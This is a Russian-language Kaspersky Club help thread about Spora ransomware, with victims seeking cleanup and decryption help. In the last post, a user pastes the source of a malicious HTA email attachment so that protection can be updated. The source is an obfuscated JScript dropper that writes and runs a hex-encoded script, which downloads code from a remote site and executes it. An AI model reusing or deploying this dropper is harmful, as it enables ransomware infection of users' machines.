Перейти к содержанию
20 лет клубу! Куда отправится Kaspersky Club? Нажми, чтобы узнать локацию! ;)

Вирус Spora поменял кодировку документов

bread89
 Поделиться

Рекомендуемые сообщения

bread89

bread89

Опубликовано
Опубликовано (изменено)

Добрый вечер, не знаю что и делать, все файлы офиса битые(. Вирус попал при открытии почты, картинки тоже не открываются, создались файлы *.lnk на всех дисках

Изменено пользователем bread89
SQ

SQ

Опубликовано
Опубликовано

Здравствуйте,
 

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
CloseProcesses:
2017-01-10 14:15 - 2017-01-10 14:15 - 00212512 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
2017-01-10 14:15 - 2017-01-10 14:15 - 00009094 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
2017-01-10 14:10 - 2017-01-10 14:10 - 00001088 ____R C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
Folder: C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:09 - 2017-01-10 14:15 - 00364184 _____ C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:09 - 2017-01-10 14:15 - 0364184 _____ () C:\Users\KompMaster\AppData\Roaming\3099727341
2017-01-10 14:15 - 2017-01-10 14:15 - 0009094 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.HTML
2017-01-10 14:10 - 2017-01-10 14:10 - 0001088 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.KEY
2017-01-10 14:15 - 2017-01-10 14:15 - 0212512 ____R () C:\Users\KompMaster\AppData\Roaming\RUF9A-F8EEE-TOKTZ-TFROT-XAART-KZYYY.LST
Zip: C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe;C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe;C:\Users\KompMaster\AppData\Local\Temp\un7.exe;C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe;C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
C:\Users\KompMaster\AppData\Local\Temp\23caa910-d6d6-3608-4619-92ae79505bfc.exe
C:\Users\KompMaster\AppData\Local\Temp\81063163ded.exe
C:\Users\KompMaster\AppData\Local\Temp\PidGenX.dll
C:\Users\KompMaster\AppData\Local\Temp\SkypeSetup.exe
C:\Users\KompMaster\AppData\Local\Temp\un7.exe
C:\Users\KompMaster\AppData\Local\Temp\YandexPackSetup.exe
C:\Users\KompMaster\AppData\Local\Temp\{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe
Reboot:
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.


Файл <дата>_<время>.zip (где <дата> - текущая дата <время> - текущее время) с рабочего стола отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)

bread89

bread89

Опубликовано
  • Автор
Опубликовано (изменено)

Почистил сегодня комп GDATA_ANTIVIRUS распоздал вирус Spora и почистил весь комп, но проблема с ворд файлами и фото осталось, файлы перекодированны

ответили на письмо:

письмо:

[KLAN-5642658061]

Спасибо, что отправили файл на исследование в Антивирусную Лабораторию.

Антивирус Касперского проверил файлы.

Вредоносные программы не найдены в файлах:
23caa910-d6d6-3608-4619-92ae79505bfc.exe
PidGenX.dll
un7.exe
{9C1415A1-791E-4D6D-987A-9E521A747D55}.exe

Мы исследуем эти файлы. Если результат исследования будет отличаться, мы сообщим вам по электронной почте в течение пяти дней.

Это сообщение сформировано автоматической системой приёма писем. Пожалуйста не отвечайте на него.

Антивирусная Лаборатория, Kaspersky Lab HQ

"Ленинградское шоссе 39A/3, Москва, 125212, Russia
Телефон/Факс: + 7 (495) 797 8700 
http://www.kaspersky.com http://www.viruslist.com"

 

Fixlog.txt

Изменено пользователем bread89
  • 1 месяц спустя...
TRuF

TRuF

Опубликовано
Опубликовано

Пришел архив с социально адаптированным названием Акт сверки_ноябрь2016_перерасчет (для сверки).rar весом 1 448 байт

Внутри не менее веселое название Скан-копия от 13.02.2017. CPOЧHO для пpoверки. ПРОВЕРЕНО директором компании_Для печати_.0b87832.hta весом 2613 байт.

Несколько символом в бинарнике изменил чтобы не сочли за распространителя вредоносного кода.

 

<hta:application windowstate='minimize'/>
<script type="text/jscript" language="JScript">
/// 231b6cab8f093d6b8fcf224a9470921f
var g=2+3
if (g=5)
/// f3bde637038f2de9838e4700b8cddf5c
{try{ty=new ActiveXObject("Excel.Application")}catch(e){};};
else
/// a59c6d58d3dc8429d7dcf89dceb88789
Nothing();
/// e2502d119f7a98d7fd47fe3a5d2c332f
/// b59627e8e9a3f95063b80ebd6508481e
/// b455ff4cfe958f396abcfacf36533c82
var hol=8+15;
/// a7bab053a61d99715955e4f220f05e5f
hol.toString();
f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");z=f.getSpecialFolder(2)+'\\'+f.getBaseName(f.getTempName())+'.wsf';var d=f.getBaseName(/filename="(.+)"/);var r=x.createElement('bill'),y=0;r.text="964223E0D0A3C6F626A6563742069643D227479222070726F6769643D226D73786D6C322E786D6C6874747022202F3E0D0A3C6F626A6563742069643D2271222070726F6769643D2241444F44422E436F6E6E656374696F6E22202F3E0D0A3C6F626A6563742069643D22686F222070726F6769643D225368656C6C2E4170706C69636174696F6E22202F3E200D0A3C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A575363726970742E536C6565702832303030290D0A766172206A6F3D322B330D0A76617220676C6F3D380D0A69662028676C6F3D35290D0A7B6A69703D6E657720416374697665584F626A656374282241444F44422E5265636F726473657422297D3B0D0A656C73650D0A7B6E657720416374697665584F626A6563742822536372697074696E672E46696C6553797374656D22297D3B0D0A7661722075203D2074793B0D0A752E6F70656E2822474554222C22687474703A2F2F7374726F796D6F6C6C2E636F6D2F686F6F64222C30293B0D0A752E73656E6428293B0D0A6576616C28752E526573706F6E736554657874293B0D0A203C2F7363726970743E0D0A203C73637269707420747970653D22746578742F6A73637269707422206C616E67756167653D224A536372697074223E0D0A20575363726970742E536C6565702832303030290D0A2076617220686F6C3D382B31353B0D0A20686F6C2E746F537472696E6728293B0D0A0D0A20203C2F7363726970743E0D0".replace(/^\s*(.+\s+){4}/,''),r.dataType='bin.hex';s.type=1,s.open(),s.write(r.nodeTypedValue),s.saveToFile(z),s.close();a.ShellExecute(z)
/// a1325c49cbe093e8c4c0eff6f6e1f54c
 try{f=new ActiveXObject("Scripting.FileSystemObject");s=new ActiveXObject("ADODB.Stream");a=new ActiveXObject("Shell.Application");x=new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");var m = new ActiveXObject("Word.Application");m.Caption =("Test");m.Visible =("True");var j = m.Documents.Add();var l = m.Selection;l.TypeText("");}catch(e){};try{l.TypeParagraph();j.SaveAs("bill(14.02.17).doc");}catch(e){};
window.close()
 </script>

 

 

На какой email отправить оригинал?

и когда реально ждать обновления защиты?

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • alegator2222
      Шифровальщик SPORA
      Автор alegator2222
      Добрый день коллеги, подверглись атаки вируса spora, шифрует файлы в hta, есть способ расшифровать? 
      пример_hta_файла.rar
    • stasnakhlov
      зашифровали файлы .hta
      Автор stasnakhlov
      Добрый день. 
       
      Проблема следующая: через почтовый клиент был открыт файл с вирусом, сам комп не заразился, а вот рабочий сервер пострадал, половина файлов за шифровались под расширение .hta . 
      CollectionLog-2017.10.25-14.04.zip
    • Viki
      Шифровальщик Hta
      Автор Viki
      Пришло письмо на электронную почту, с содержимым вроде "документы проверенны, с нашей стороны все в порядке, посмотрите с вашей" и прикрепленный файл hta, открыла, все документы на рабочем столе стали с расширением hta. исчезли все данные с 1с кварта и т.д. Как можно все восстановить подскажите пожалуйста
    • mixali4
      Шифровальщик Spora
      Автор mixali4
      Доброго времени суток. С почтового ящика qeer@mail.ru пришло письмо со следующим содержимым:
      Случайно запустил на компьютере файл, который пришел в архиве.
      Вирус зашифровал много файлов, но я успел вовремя отрубить, файлы преобразовались в расширения типа *.doc.hta, *.xls.hta. При открытии файла требует деньги, почта spora.help@gmail.com.
      Как расшифровать данные файлы, что вообще можно сделать?
      Документы очень важные. Ребята помогите пожалуйста.
      Спасибо!!!
    • Владимир72рус
      поймали шифровальщик spora, как дешифровать файлы?
      Автор Владимир72рус
      Вчера на работе у нас произошел инцидент, одна наша сотрудница приняла письмо по почте, от неизвестного источника, соответственно распаковала и открыла файл, сама того не понимая, что это был скрипт.
      После чего вирус начал делать свои дела на компе и в сети, то есть начал шифровать файлы, параллельно производил поиск в сети всех расширенных папок и начал шифровать все файлы.
      выкладываю файл со скриптом, а так же фото рабочего стола
       

      Строгое предупреждение от модератора Mark D. Pearlstone не выкладывайте вредоносные и потенциально вредоносные файлы и ссылки на форум.





×
×
  • Создать...